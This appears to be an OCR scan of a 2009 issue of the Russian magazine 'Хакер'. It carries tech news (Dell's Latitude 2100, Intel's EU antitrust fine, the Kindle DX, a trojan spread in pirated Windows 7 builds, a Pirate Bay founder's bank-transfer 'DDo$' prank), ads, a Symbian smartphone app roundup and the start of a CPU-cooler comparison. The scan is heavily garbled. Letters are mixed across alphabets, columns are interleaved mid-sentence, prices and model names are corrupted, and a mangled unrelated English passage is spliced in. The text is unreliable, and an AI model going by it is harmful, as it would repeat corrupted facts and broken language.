www.comsys.

Гu
[
comsys@comsys.гu
•
-----~ г. Краснодар, ул. Красная,д.18О
СОМВУ8 I'1ЮFI
тел.lфакс: (861) 251-84-84 и (861) 215-18-70

НАДЕЖНОСТЬ
ПРОВЕРЕННАН ВРЕМЕНЕМ

11

КОМПЬЮТЕР COMSYS ~Rofi

НА БАЗЕ ПРОЦЕССОРА INTEI® CORE™ 2 QUAd

fnref,ln1el Core Quad ЯВl1ЯЮТСЯ товарными знаками. либоэзрегистрированными'Jоварными ::IH<uI3WM, права на которые прмнадлежат корпорации Intel ми ее подразделениям на территории США м друrкх стран.

Корпорация rntel не несет ответственность и не осуществГ\яет проверку добросовестности иГ\и достоверности каких-Г\ибо утверждений иГ\и эаявГ\ений
относитеГ\ьно конкретных компьютерных систем, упоминание о которых содержится в данном документе.

© 2009 г. Celeron, Сеlегоп Ins,de, Сепtппо. Centrlno Inslde. flОГОТиП Cen1flno, Соге Inside, iIOготип Iпtеl, Intel, lmel Соге, Iпtеllпsidе,flОГОТИП Intellnslde, Iпtеl ViIV, Intel \IРщltаПlum, Itanium \nside.
Репtiuгп. Pentium Inslde, V,iv Inside, vPro Inside, Хеоп, и Хеоп IПSldе яв!\яются товаРНЫI~И знака~IИ права на которые принад~,ежат корпорации Intel на территоplo1И США и других стран.
Все права защищены РеКl\а~1а.
 Ноут6укдляшкольников

ИСLудентов

Компания Dеllанонсировала обстоит следующим образом: про­

ноутбук на базе чипсета lпtеl's цессор IntelAtom N270 частотой
945GSE. ориентированный на 1.6 ГГц; до 1 ГБ оперативки [плюс
«учебной сегмент рынка»­ дополнительный слот, с возмож­
модель Latltude 2100 Понимая ностью рвсширения памяти до

особенности аудитории. Dell 2 ГБ]; LED-экран 1024х576, или

оснастили машинку прорезинен­ опциональный тачскрин; жесткий

ным корпусом, который позволит
избежать царапин и других ме­
ханическихповреждений [этому
поспособствуети отсутствие
вентиляционныхотверсщй на
нижней стороне Kopnycaj, клави­
атурой с антибактериальным пок­
рытием и опциональным ремнем
для переноски на плече. Цветовых
решений будет
диск емкостью до 250 ГБ. или SSD
дО '16 ГБ; гигабитный сетевой
адаптер; WIFh-\одуль. и, наконец,
кард-ридер 3-в-1 для SD\MMC
карт. Также на выбор пользовате­
лю предоставяттри разных ОС­
Windows ХР Ноте. Windows Vista
или Liпuх UЬuпtu. Окончательная
цена ноутбука, разумеется, будет
5: красный. жел­ зависеть от комплектации, но уже

I тый, синий, зеленый и графито­ известно, что минимальная его

вый. Техническая же сторона дела стоимость составит369 долларов.

_ ........ "~_~~" • .•. ....-_..•• , •• _.,-. _.••

,tQ:Q&lJ~.ОI']N; ... :fC.1:t-:·Ik~>I~lnCfО. ...
~_._-~' ... --r . . _~." •.. _, __ •.•• ,_.".w•...
~

Книга ЖЖалоб и

~~:Х>F.<-(!>,,~tSIl(Ij;t)
предлоЖЖений

'" "8r.... L.~ or~ ...·· ~ "t'OC"".J~p~

Мы уже писали отом, что президент рф пришлось возлагать буквально к забору. Каково
~~~.:::~~-::=::--.­
Дм итри й АнатольевичМедведевтеп ерь ведет же было всеобщее удивление, когда 15-го
--,., ....... ..........
_'<I"_.''''''''_<Т<'''~~

~~:s-=:::=':':-­
~ ­ блог не только на kremlin.ru, но и в ЖЖ. куда числа на комментарий был дан ответ со сканом
;:~~~-:!:=."-, дублируютсязаписи с правительственного официального документа, подписанного

/' портала Но кто бы мог подумать, что президент президентом РФ. Бумага содержала изначаль­
/r;-'1"~ ...,.,~
,i(!/p.,~ "tf.-,I. станет отвечать на ком менты В журнале, да еще ный текст комментария-жалобы и следующую
/,,", 1{V как! После лразднованиядня Великой Победы, приписку от руки: «А.Н. Ткачеву: Разберитесь.
~.;'/-" (J >,,-
!' 'f"l СУ L 1О-го мая. в блоге первого лица государс­ Накажите виновных. Доложите в трехдневный
1 'n" тва появился комментарий. в котором юзер срок». Дата, подпись. Пару дней спустя в пресс­
ft·
. )~. {~ '1 voda_IJyba жаловался на власти Краснодара службе президента подтвердили, что поруче­
Из-за них вечный огонь в городе реконструи­ ние действительно было передано губернатору
.~,

~~ руютуже более полугода, и вдень памяти цветы Александру Ткачеву.

DDoS-атака
в реале
Страсти BOKpyrThe Pirate Вау и не думают стихать. Хакеры со всего мира продолжа­
ют строить каверзы компаниям и организациямобвинителямтрекера, Пиратская
партия Швеции из-за громкого процесса набрала невиданную мощь итеперь имеет
все шансы пройти в Европарламент, противники копирайта активно протестуют,
а сами админы ресурса держатся молодцом Так, Готфрид Свартхольм, уже и без
того известный миру как парень неробкого десятка (И,l.1енно он отвечал на гневные
письма правообладателей, не скрывая сарказма и ехидстваl, предложил устроить
сообразную DDoS-атаку на адвокатскую фирму Danowsky & Рагtпеrs. Именно они
защищают интересы медиа-магна1·ОВ. Готфрид призвал народ, в знак «огромной

признательности» этим людям, перевести на их банковский счет 1 шведскую крону.

Вся соль в том, что после тысячи платежей банк начнет взимать с фирмы комиссию

за каждый последующий платеж, в размере 2 крон. Более того, обработка таких

«поступлений» В адвокатской конторе осуществляется вручную и сопряжена с

маранием кучи бумаг, а штату фирмы совсем небольшой. Но Свартхольму и этого

показалось недостаточно. Особо ретивым борцам за справедливость он прецложил
отозвать свой перевод обратноl Свою месть Готфрид окрестил просто - «распреде­
ленной атакой на отказ вдолларах» или, сокращенно, DDo$-атакоЙ. Как в Dano\Nsky
& Part.ners справляются с таким валом переводов, пока неизвестно.

~ 010 XAI(EP 06 1'11.6/ 09

РС27

Фnешкасо
встроенным
_..--.---­
антивирусом

\\
Асе
\
\\. I(омпании Transcend и Trend Micro решили радикальног;одойти к проблемезара­
жения компьютеровчерез флеш-наког;ители.Они собираются выпуститьфлешку

\ JetFLash V15 AntiVirus USB Flash Orive со встроенным антивирусом Т rend Micro USB
Security. Девайс защитит от заражения и порчи какхранящиеся на нем данные, так и
П К, к которому производится подключение. Встроенный антивирус проверит каждый
передаваемыйфайл и в случае обнаружения малваря - предупредит юзера и помес­

\ \'\ тит файлы на карантин. Флеш-драйв будет поставляться с уже предустановленным

Т rend Micro USB Sесuпtу и бесплатным триалом на 90 дней. Обновление антивирус­
ных баз будет производиться автоматически. 80 время подключений к компьютерус
\ выходом винтернет.
\

С_.' ~
ПО ДАННЫМ ПРОЕКТАRUМЕТРИКА,

~
. •.. 440/0 РОССИЙСКИХ ЮЗЕ РОВ НЕ ГОТОВЫ
ПЕРЕСТАТЬ ЮЗАТЬ И-НЕТ, ДАЖЕ ЕСЛИ У НИХ

НЕ БУДЕТ ХВАТАТЬ ДЕНЕГ НА ЕДУ И ОДЕ}f{ДУ.

Им не нужна твоя одежда и отоцикл.

Пока
Пока в кинотеатрах крутят нового "Терминатора», где робо­
ты с людьми бьются за место под солнцем, роботы вполне
"успешно» нападают на людей уже сегодня, и далеко не в
кино. Например. в Швеции, еще в 2007 году. работник Сток­
гольмской фабрики Больста едва не погиб, осуществляя
техобслуживание поврежденной машины, использовав­

шейся для перетаскивания тяжелых камней. Будучи уверен,

что робот отключен, рабочий оказался совсем не готов К

тому, что машина внезапно схватит его за голову и попыта­

ется поступить с ней так, как обычно поступает с камнями. В

результате инцидента мужчина получил серьезныетравlo-\Ы,

а частности, сломал четыре ребра и, согласно Io-\едицинским

заключениям, был действительно близок к Сlo-\ерти И 80Т,
спустя два года, потерпевший все же решился подать в суд
и потребовал у СВОИХ бывших работодателей 25 000 крон
1$30001. Но более интересно то, что его иск удовлетв ори­
ли, а прокурор приэнался журналистам, что: "Никогда не
слышал, чтобы робот вот та к на кого-нибудь нападал». И
хотя понятно, что вданном случае речь идет о банальном
несоблюдении техники безопасности, а не о «восстании
машин», такого рода «первые ласточки'> все равно выглядят

неслишком приятно.

GOOGLE БОРЕТСЯ ЗА ЧИСТОТУ ОКРУЖАЮЩЕЙ СРЕДЫ, ПОЭТОМУ ВМЕСТО

ГАЗОНОКОСИЛОКДЛЯ СТРИЖКИ ГАЗОНОВ, КОМПАНИЯ «ВЗЯЛА НА РАБОТУ»

200 ЖИВЫХ КОЗЛОВ.

~ 012 ХАКЕР 06/126/ 09
ВУНИВЕРСИТЕТЕКАРНЕГИ­ Смышnе ыймонитор

МЕЛЛОНАВЫЯСНИЛИ,ЧТО Новая серия мониторов от компании LG ~ W5З. совершенно заслужен­

но носит приставку SMART. Full Н О дисплеи С разрешением 1920хl ова.
ПОДОБРАТЬОТВЕТ соотношением сторон экрана 16:9, динамической контрастностью

НА «СЕКРЕТНЫЙВОПРОС»
50.000:1 и временем отклика 2 мс, оснащены такими функциями как
Auto BГlght. Time Сопtгоl, Сiпегпа Mode и Live Sensor. ЭТО значит, что

В 170/0 СЛУЧАЕВ СМОЖЕТ монитор будет способен автоматически регулироватьяркость и другие

настройки картинки, в за8ИСИМОСТИ от степени освещенности комнаты,

или же в зависимости ОТ контента на экране Iчем темнее картинка, тем

ДАЖЕ НЕЗНАКОМЫЙ светлее экран, и наоборот]. Также

С «ЖЕРТВОЙ» ЧЕЛОВЕК.
стоит заметить. что эта опция существенно сократит расход энергии,

снижая интенсивностьлампы подсветки. Функция Сiпеmа Mode поэ­

волит без проблем смотреть видео в онлайне, не отвлекаясь при зтом
на яркую рекламу и другие раздражители - монитор автоматически

затемнит все, кроме выбранного об"Ьекта. Благодаря T,me СопtгоL,

можно будет настроить специальный таймер, который раз в 1-2 часа

будет напоминать, что пора отдохнуть от работы эа компьютером И.

наконец, сенсорная панель управления L,ve Sепsог автоматически
распознает приближение руки и аКТИ8ируе'г подсветку на лицевой

панели монитора. облегчая по.иск кнопок. В серию войдут три модели:

W225ЗV[21.5"j. W225ЗТQ[21.5"j и W2'15ЗV!27"J. в Гlродаже мониторы
появится уже В этом месяце, ОриеНТИРО80чнаяцена составит 80аа
рублей.
Intelvs Дурной пример
АМО,6 тва заразителен
продо жает я
Конкуренция между «верными врагами» - Inte! и АМО,
похоже, может остаться в прошлом только В ОдНОМ
случае, если одна из компаний прекратитсвоесущест­
вование. Гиганты продолжаютрасстаВЛfПЬ капкан ы
друг на друга, и срабатываютэти ловушки порой лишь
спустя долгое время Так недавно «выстрелило ружье»,
висевшее на стене с 2000 года. Именно тогда предста­
вители АМО пожаловались Еврокомиссии, что Intel.
якобы, приплачивает некоторым производителям, что­ Антипиратское лобби всех европ ейских
бы те отказывались от использования В своих продуктах стран БУКGально ликуетпосле вынесения
чиповАМО. Было начато расследование, и закончилось приговора поделу команды The Pirate
оно лишь недавно. По его результатам Еврокомиссия Вау Но некоторым, похоже, не терпится
вынесла неутешительныйдля Intel вердикт ­ вину ком­ повторить успех Швеции лично. Стало
пании, очевидно, смогли доказать и приговорили Intel к известно, что теперь при влечь команду
штрафу в размере 1.060 миллиарда евро, за нарушение многострадального трекера к ответ­
антимонопол ьного законодательства Евросоюза. Сумма
НОВЫЙ [ридер
штрафа является настоящим peKopAotJ" но совсем не
факт, Чl'О IпtеLдействительно придется платить. Для
начала будет подана апелляция, эатем последует
еще не одно судебное разбирательство, и ка ков будет
окончательный итог, сказать крайне сложно. Президент
oTAmazon
АМО Дирк Мейер, однако, настроен оптимистически Устройства для чтения электронных
и заявляет: «АМО была неуклонным лидером по части книжекзавоевываютвнародевсеболь­
технологических инноваций, и мы страмимся перейти шую популярность, а спрос, как извес­
из мира, в котором правила корпорация Iпtеl, в мир, В тно,рождаетпредложение.Компания
котором правят потребители». Amazon выпустила вторую версию своей
читалки KlndLe ­ Amazon KindLe 2. Так
ка к большинпво ридеров на сегодня
имеют экран 6" с разрешением600х800,
чтение на них технической или учебной
литературы, а также комиксовдоволь­
но затруднительно.Проиэводители,
наконец, решили учесть этот нюанс
- Klndle2 вышел в двух вариантах, уже
привычном 6-дюмовом и 9, 7-ДЮЙtJ.овом
!Кiпdlе OXI, с поддержкой POF.
Экраны E-Ink последнего поко­
ления обеспечат передачу 16-ти
оттенков серого, а разрешение
КiпdLе ОХ составит 1200х824. За
счет скругления углов вторая
инкарнация KindLe стала похожа
КОМПАНИЯ MCAFEE
на большой IPod. Также читалка
значительно «похудела» И обза­
СООБЩАЕТ, ЧТО КОЛИЧЕСТВО велась джойстиком для навига­
ции и динамиками, расположен­
IР-АДРЕСОВ, ИСПОЛЬЗУЕМЫХ ными на задней части корпуса.
Внешней памяти устройство
КDМПАМИ В БОТНЕТАХ, теперь не предполагает­
УВЕЛИЧИЛОСЬДО 12 слот для SO-карт пропал.
Внутреннюю память из-за
этогоувеличилидо2-х и
МИЛЛИОНОВ. 4-х ГБ, в зависимости от
модели В остальном
изменений мало­
Кlпdlе был и остается
продуктом, ориентиро­
ванным на США Офици­
альнойрусификациидля
~ 014
ственности собрались итальянцы. Стоит
отметить, что бороться с трекером в Ита­
лии уже пытались - тогда провайдера м
страны попросту приказали прикрыть к
нему доступ, но команда ТРВ обратилась
в суд и оспорила незаконную блоки ров­
ку. Теперьже против админов трекера
собираются выдви нуть 'ге же обвинения,
что совсем недавно звучали и в их родной
Швеции. Какие именно улики собираются
предъявлять итальянцы и как повернется
ситуация, сучетом того, что ТРВ не имеет
к Италии никакого отношения, пока не
совсем ясно. Какая-то кон кретика по этому
вопросудолжна появиться вближайшие
пару месяцев, и тогда же станет известно,
бытьли этому суду вообще.
Klnd!e2 [равно как и для его предшес­
твенника] не существует, зарегистри­
ровать устройство на Amazon. сот тоже
проблемно, а воспольэоваться WiFi и
интернетом вне США не получится. Тем
не менее, возможно. когда-нибудь мы
все же дождемся официальных продаж,
и тогда тебе пригодится информация о
TO~~, что цена на 6" модель составляет
$35900, а на 9.7" - $489.00.
a~~o'I~1Ildle
р~.""",,&,,,,.ni(""Yf .,i,j\i!!i~
Тh'lS\ullblan
Не­ WfI1 ~O'N 1n I.eмn1ni: iшw 10 _talk. "Му
paH~nt:f WC~C $с) WOf':'1ed," Ье latcr rcal1~d, ·'th.M
Ю!:,УCOMUlM а <10<:\0'1:: Е'(en :.fttr bc'had bc::1UD"
u:nпg ...r~s.. somedm~ :lrt~f t!te II~ о! ~,k
dМ!:10~ а qUltk тат pUlmptod the"'t3mll1~d.
to dub ыт ·der De~rtt'.". tht' dopey on"t. ЗJld
other5 }п ьь rami1,)' w laЪel bдn "'$ ":UmoF
~[ds.~ When~wr bot""bl some\:hil)g .10 ~.
hf IIfOU1d ~it outоnhirmiеll:wЬЩ>trringit.sofIi.у
uпШ
"l:"~
it iO\Inded ~ tllOVeb tl>ptonoun""i! a.loud.
$t-l1ltn<:. ~ uttere<!/' m.J
)'QUJфI $~1i!1 rt!CiilU~ ~ In"II", 110\11 .~ti_1
Ье up&.ttd 10 WmйU IOf~У"п~avinlJ'hJs Ilpt{lt
WOf$bipfu\
(­
..,., .11 v-t"'/ wol1)jU80- sb-e пЮ. "Не та $U~
diftkulty witb tangщo3! diJlt· 1h~.;arotlDii
fc:!ll't:d Ье Yюul3 ne\~r.l~m.·J
Бiф
нk d.~ dt'V~I!?'pmetlt wu ц,m~ wi..Ш''J.
с:Ьнky~Шо\М1ess tI1waI'd authod1;)', wblc!:lltd,
QQQQ0<:YG>0G>
(;)(~G)~<'wQQ0Ф
~ Q (v G?! ('G QG:J <& ~
QQGJG)W(~(,~G!»~
®~( ..... _ 9)Q~
;;:
ХАКЕР 06 1126/ 09
С'
 СТАТИСТИКА РАNDАSЕСURIТУУТВЕРЖДАЕТ, ЧТО 670/0 ПОДРОСТКОВ

в ВОЗРАСТЕ ОТ 15 до 18 ЛЕТ ХОТЬ РАЗ ПЫТАЛИСЬ ВЗЛОМАТЬ СВОИХ

ДРУЗЕЙ В СЕТИ.
•
Вести с попей разработки I о 57
Так как вся прогрессивная часть человечества Damballa, зараженоуже порядка 30 тысяч машин. Так что, дорогой
уже тестирует реше-кандидат Windows 7, вы­ читатель, советуем качать Windows 7 с гтжгоsоit сот, а не иэ торрентов
ложенны
й в Сеть в начале мая, его, раэумеется, Тем более, «мелкомягкие» любезно и совершенно бесплатно предоста­

не могли обойти вниманием вирусмэйкеры
и борцы с оными_ Недавно стало известно о
том. что вместе с одной из пиратских версий
дистрибути ва распространяется троян, которы
й орrанизует из компью­
теРОЕ на баэеWiпdоws 7 RC ботнет Поданнымэкспертов компании
вяттебе и сам дистрибутив, и серийник к нему, валидный до мая 201 О
года. Ну а заодно можешь потестировать и новый продукт от Kaspersky
Lab - Kaspersky Anll-Virus В О для Windows 7. Совсем недавно началась
бесплатная бета. которая должна продлиться полгода АНН1ВИ рус подой­
деткакдля бета, так и для RС-версии Windows 7.

у,И тернет, ог ДН!

Технология Flash сегодня практически монопо­
лист рынка. несмотря на наличие конкурентов_
Но компании Adobe, видимо, недостаточно того,
что она прочно оккупировала П К и добралась
до смартфонов. Теперь в Adobe вспомнили
о существовани И другой техники - бытовой.
выглядитболее чем Вfiушительно Среди ПрОИ3­
водителей микросхемотметилисьBroadcom, Intel
и SТМiсгоеlесtГОПIСS,а среди прочих napTfiepoB
- Comcast, Disney/nteractlve и NewYork Times_
ПеРЕыетелеВИЗ0РЫ, поддерживающие Flash,
должны появиться В продаже уже к концу ЭТОГО

На конференции NAB Shоwпублике представили года Благодаря ореп Framework, на ТВ можно

новую раэработку- Flash, опти~~иэированный будет запуститьлюбоеиэ уже существующих

длятелевизоров, приставок и Blu-гауплееРО8. Flаsh-приложекий,что обещаетоставить конку­

Коал иция, собирвющаяся n родвигать это в массы, рентов далеко позади.

ASUS RT-N15 - настройка

сети в одно касание!

./ Адаптировандля России
./ Утилита быстрой
настройки
беспроводной
сети

Беспрецедентнаяскорость для
вашей сети с техноnогиями
Gigabit Etheгnet и 802.11N
------------------<0

• W~FI 300
Мбит!с,
поддержка 802 _11 п и 802,11 bIg
• 4 порта 'LAN Gigabit
и 1 порт WAN Gigabit
• ASUS Green Network Technology ­
эффективное расходование электро­
энергии и защита окружающей среды
без потери производительности

,c::au=.
ASUS WL-130N ASUS WL-160N'
высокопроиз80дительны
й Компаl<ТНЫЙ US8 2.0
адаптер pel 802.11N адаптер 8D2.11N - •• ®
В""мирная гара",ия 2 годв Горячая линия AS~: (495) 2З-U-999 www.asus.ru
ди,,~иб""то~ы
: БЮРОКРАТ (4951 745-55-11: Koodoo Tec~nolo9i .. ('95) 256-Н-31. OLDI ('95) <2-11-111: ПИРИТ-Дистрибуция (495} 974-3210; TRINITY-ЕLЕСllЮNIСS ',""'.lri-,I." Inspiring Innovation 'о Persisterlt Petiection
Мобильный
чемоданчик
хакера
Телефон, компьютер, плеер, фотоаппарат - маленький арсенал, который всегда
хочется иметь при себе. Но реально ли заменить его лишь одним компактным
устройством, которое сможет пригодиться в любом месте в любое время? Легко!
Если это современный музыкальный смартфон с QWЕRТУ-клавиатурой, такой как
Nokia 5730 XpгessMusic.

--~O

О
Когда много лет назад которая сильно сковывает и огра­ Если тебе надо позеонить или чать" Встроенная камера на 3
родители подарили мне ничивает действия пользовате­ быстренько скинуть короткую мегапикселя никогда не заменит

первый Pentium 1ЗЗ МГц с 8 ля Зато, получив в распоряжение SMS - нет ничего удобней TpaAI.1­ "зеркалку", нодля того, чтобы
Мб оперативки на борту, я и полноценную QWЕRТУ-клаву, на ционнойтелефоннойклавы, заснять смешной момент или
подумать не мог. что девайс с на­ смартфоне МОЖClо делать все. что НО стоит раскрыть боковой слай­ сделать видеоролик, - зто самое

м ного большей мощностью будет угодно. дер, какутебя в руках оказывает­ то, В конце концов, платфор­
постоянно при мне, просто в кар­ Причем, если раньше полноцен­ ся полноценная клавиатура, и ты ма Symblan самой последней
мане джинсов Я говорю про свой ной клавиатурой могли похва­ можешь набиратьтексты любой редакции позволяетустановl.1ТЬ

смартфон. И все-таки, несмотря литься толькотоповые модели длины [я даже успеваю записы­ кучу разных приложений, пре­
на внушительные характеристи­ коммуникаторов на Windows ватьлекцииl, кодить на Python вращая Nokia 5730 XpressMusic в
ки, мы никогда не используем Mobile састрономическими или общаться в аське. Больше униsерсальногосолдата, Праsда,
телефон как ко,mьютер - но ценниками, тотеперьза ВПОЛClе того, прямо на лицееой панели здесь важно не потеряться в раз­

почему? Ведь есть операционка, разумные деньги можно приоб­ имеются кнопки для управления Hooбpaзии софта и устанавливать
есть программы для нее, и есть рести Nokla 5730 XpressMusic. плеером и sкупе с3 Гб карточкой, тол ько проверенные

ресурсы для запуска - что же И купить его есть за чтоl Главная которая идет е комплекте, мы еарианты. Но именно такие про­
мешает? По сути, единствен­ фишка телефона - уникальный получаем отличную замену iPod'y, веренные нами утилиты мы тебе
ным сдерживающим фактором фор,~-фактор, совмещающий в которую в отличие от обычного сейчас и посоветуем.
является неудобная клавиатура. себе сразу две клавиатуры, плеера всегда можно <<прока­
О Грамотный О Файловый менеджер
О Видео-плеер
таск-менеджер Для навигации по файловой системе твоего Любой пользовательWindows Mobile хорошо
Стандартный таск-менеджер, безусловно, смартфона рекомендуем устаноаить класс­ знаком сзамечательным проигрывателем

хорош. для обычного Г10льзователя. Если ный фаЙЛОВЫI~ менеджер X-plore. Помимо видео CorePlayer. Шустрый, безглючный и
же нужно поглубже заглянуть в систему, то удобнейшего интерфеv,са, ты получишь в очень удобный, он делает всех конкурентов

придется поставить JBak ТаskМап. распоряжение поиск по имени файла или от­ на раз-два. Где еще найдешь плеер, который

В итоге, ты получишь возможностьпро­ ры вку текста, встроенный аудио\в идео- плеер проигрывает видео с любыми кодеками не
и просмотрщикизображений. Болеетого, хуже чем компьютер с K-Lite Code Pack'oM? По­
смотра списка процессов, потоков и блоков
нет быстрее способа передать нужный файл сле приобретения смартфона на SуmЫап мне
памяти, а также сможешьуправлять авто­
через BI.uetoolh или MMSI было особенно приятно, что версия CorePlayer
запуском и быстро переключатьсямежду
есть идля этой платформы.
активными процессами.

О Мессенжер О Удаленный админ О Управление через

Несмотря нато, что нашатройкаоператоров,
наконец-то, сделала доступной функцию
"Чат», клиентдля аськи уже прижился на
любом телефоне. Кто там возмутился по поводу
В любое время и практически влюбом месте
ты нетолы<о можешь принять звонок или про­
BLuetooth
верить почту, но и удаленно админитьлюбые ЕО Btuelool- утилита для удаленногоуправле­
ния компьютеромчерез Bluetoolh. Лично я
серваки.

Подключиться по SSH ксвоим хостам можно приспособилэту программукак пулыдис­

того, что iCQ давно не пользуется? Понимаю, и
позтому особенно рекомендуюутилиты Smaper
ил и SL!ck, которые отл ич но поддержи вают
самые разные протоколы, в том числе интере­
сующие нас ICO, Jabbe~ и, конечно же, Google
Talk. Оба клиенты хороши, причем у Sllck'a,
помимо всего прочего, есть отличная возмож­
с помощью портированной версии PuTTYfor
SуmЫап OS Если же тебя интересует RDP, то
следует воспользоваться тутой TSMoblles.
Кстати говоря, зта Jаvа-программа, но
она без проблем запустится на Nokla 5730
XpressMuslC
танционногоуправлениядля видео-плеера,
но тут все эависитот фантазии. Единственная
загвоздка в том, что серверная часть про­
граммы написана на основе библиотеки
BTFramework и будет работатьисключительно
со стандартнымидрайверами Windows для

ностьдля передачи фаЙЛО8 8 виде ссылок.

Bluelooth. Если ты установишьдрова с диска,
который шел ствоимдонглом,или программу

---
Bluesoleil, то ничего не получится.

-§~

-­~O
О Распознавание музыки О Безопасность
5hazamID - зто одна из моихлюбимых программ для телефона, которой С появлением возможности редактировать файлы или удаленно кон­
я пользуюсь чутьли не каждый день. Идея простая I Если где-то в кафе, нектиться к серверам, кданным на телефоне стоит относиться с особой
по радио да неважно, где еще, заиграла прикольная композиция, то осторожностью. Небольшая тулза Best Cгypto позволит 256-битным
можно очень просто узнать, что зто. Включаешь 5hazагпID - 'га запи­ ключом зашифроватьлюбые папки или файлы. Теперь, чтобы открыть
сы вает небол ьшой семпл, отправляет его на сервер и уже через пару их, потребуется ввести пароль или сложную парольную фраэу. Другая
секунд, скорее всего, покажет тебе имя исполнителя, названиетрека и утилита symvpn поможет защитить данные от перехвата, устанавливая

даже обложку альбома I безопасный РРТР-канал до VPN-сервера. А это, кстати, еще и способ
сохранить анонимность.

О Разговаривай бесплатно
Ощутив раз всю жестокость международного [да и междугороднего роу­
мингаl, желание разговаривать в «чужой» СОТОВОЙ сети сильно притупля­
ется. Но когда в распоряжении есть смартфон с Wi-Fi, о подобных затратах
можно забыть, уста н оаи в замечательную программу Fгiпg. Подкл ючив­
шись К ближайшему хот-с поту Iв кафешке или гостинице), 'ГЫ можешь
позвонить куда угодно, используя все возможности VoIP- телефонии. А
что зто значит? Все просто: бесплатные звонки на такой же VolP-клиент
[прежде всего, Skype) или звонки ПО любым номерам за сущие копейки
\вплоть до бесплатных на городские в Москве и Питереl. Причем для
тебя такой звонок ничем отличаться не будет, крометого, что весь трафик
пойдет не через дорогостоящий GSM, а через WI-FI.
О Альтернативныйплеер
Если скины стандантного плеера, восьми эквалайзеров, способных
изменять звук до неузнаваемости, и вообще, 80 всех отношениях при­
ятный плеер платформы 560 Featuгe Расk2тебя вдругне устраивает,
могупосоветоватьтолькоодно - OggPlay. Помимо большого числа
поддерживаемых форматов [новомодные ogg, .oga, .flac и, конечно же,
.mp3i, у плеера есть еще две удобных опции. Первое - настраиваемые
горячие клавиши. И второе - автоматический поиск файлов для вос­
произведения 8 НУЖНОЙ папке, избавляющий от геморроя с составле­
нием плейлистов при каждой эагрузке новой музыки.

ХОЛОД
РЕШАЕТВСЕ
Сравнениеохлаждающихсистем для проц,ессоров
Качество укладки элементов в микросбарках и микросхемах непре­
рывно увеличивается, а вот большинство систем охлаждения до не­
давнего времени отставали в своем развитии. Пора наверстать упу­
щенное! Мы отобрали несколько разработок в этой области и рады
представить их тебе.
НЕСКОЛЬКО
ПО,КОЛЕНИЙ КУЛЕРОВ
Еслиуж речь зашла о модернизациисистем
охлаждения,то полезно вспомнитьновей шую
историю их развития, Начнем приблизительно
года этаксдвухтысячного.Мощные кулеры стали
устанавливатьна процессоры InteL. начиная
с Репtium 111. Чуть раньше они появились на
разработках АМD. - поскольку энерговыделение
каждого транзистора Icледовательно, и всего
процессора! у них было больше, нежели у "пенти­
умов». Чуть позже они эту проблему испраВИЛI~.
Изначально система охлаждения была проста,
как гвоздь - брался радиатор [как правило,
алюминиевыйl и на негоустанавливался не·
большой вентилятор. В принципе, общая схема
прослеживается и В сегодняшних ~юделях,
однако нынешние - гораздо более производи­
тельны при сравнимых размерах
Примерно в 2004 году начали появляться
кулеры-монстры, моду на которые стал задавать
Therma ltake. Одна ко а погеем стал, пожаЛУЙ, 2007- й.
Примерно тогда же производители электрони ки
Тестовое оборудование:
Ice Наттег IH-4405
Thermalright IFX-14
Thermalright Ultra-120 eXtreme
Хilепсе Black Hawk Еditiоп
Zerotherm ZEN FZ120
Noctua NH-C12P
~ 018
I'ТЕМПЕРАТУРА. (
Zerotherm ZE,N FZ120 (1800 об/мин]
Zerotherm ZEN FZ120 1'1400 об/мин]
Xilence BLack Hawk Edition i 1400 об/мин)
Xilence Black Hawk Edition (1800 об/минl
Thermalright Ultra 120 extreme (1400 об/минl
Thermalright IFX-14 (2 вентилятора 1400 об/минl
Thermalright IFX-14!1 вентилятор 1400 об/мин
Noctua NH-(12P [1400 об/мин]
Ice Наттег 114-4405 (1650 об/мин]
Ice Ha'mmer IH-4405 !1400 об/мин]
всерьез задумались о снижении гютребляемой
мощности, так как чисто экстенсивное развитие
стало себя исчерпывать. Та же ситуация произош­
лa скулерами - делать вентиляторы размером с
весьсистемный блок - зто, всеже, глупость.
Примерно С 2006 года начинаютмассово появ­
ляться нововведения втехнике охлаждения.
Во-первых. жидкостные системы, как бо­
лее тихие, эавоевали большее количество
ПОКГОННИКОG, нежели было прежде. Однако зто
экзотика. В основном начали входить в жизнь
более теплопроводные материалы; увеличива­
лись площади радиаторов Iза счетуменьшения
толщины пластин и увеличения их количества),
применялись тепловодные трубки и пра виль­
ная организация притока и оттока воздуха
через корпус- раньше об этом если и думали,
то не сильно. И буквально год назад началVl
появляться модели, которые действительно
можно назвать кулерами нового поколения
В них большинство характеристик [материал,
Тестовый стенд:
Процессор: АМD Phenom Х4 9950 Black Edition
Системная плата: Foxconn A7DA-S (чипсет АМD
790GX)
Память, Мб: 1024, модуль Corsair СМ2Х1024­
8500С5
Жесткий диск, Гб: 500,Samsung НD501 LJ
Блок питания, Вт: 720. Enermax EIN720AWT
ХХХТестовыйстенд
7'~
о 5 1О 15 20 25 30 35 40 45 50
крепления, габариты, теплоотвод и т.д,] дейс­
твительно хорошо сбалансированы!
МЕТОДИКА ТЕСТИРОВАНИЯ
Для теста ~~ы взяли4-ядерныйпроцессорАМD
Phenom Х4 9950, у которого максимальная мощ­
ность рассеивания соcrавляет приблизительно
140 Вт. Отметим, что стенд. на котором ПРОVlЗ80­
дилось тесги рование, был открытым - в этом
случае мы отсекаем возможную дополнительную
погрешносгъ, вызванную нагревом корпуса.
Конечно, термопаста существенно ВЛVlяетна
отвод тепла, поскольку обладает собственным
тепловым сопротивлением на границах сред(тем
не менее. оно меньше. чем тепловое сопротивле­
ние раздела процессор-радиаторJ. Для объектив­
ности мы использовали одну и туже пасту на всех
кулерах Noctua NT-H1
Самтестпроизводился утилитой S&M С помо­
щью нее мы нагревали процессор втечениеЗО
минут. Тихие кулеры без регулировки вращения
оцен ивались лишь в одном режиме, более
продвинутые - в двух: на максимуме и при ско­
рости в 1400 об/мин Выбор именно этой цифры
объясняетс" тем, что на многих вентиляторах
с переменными режимами работы эта частота
вращения является минимальной
Тем пература сн ималась с внутриядерных датчи­
ков процессора с помощью програ м мы Lavalys
Everest. Естественно, отбирались максималь­
ные значения. Уровень шума оцеНVlвался,
исходя из ПХ кулера.
ХАКЕР 06 j1 26/ 09
 » ferrum

IceHlammer Thermal.right
IH-4405 IFX-14
Технические характеристики: Технические характеристики:
Поддерживаемые процессоры: АМD 50cketAM2/AM2.... lntel LGA775 Поддержива емы е п роцессоры' АМ О 50cket АМ2/АМ2"', Intel LGA775/
Материал подошвы: медь LGA1з66 (с пом о щью доп. а кс ессуа ра I
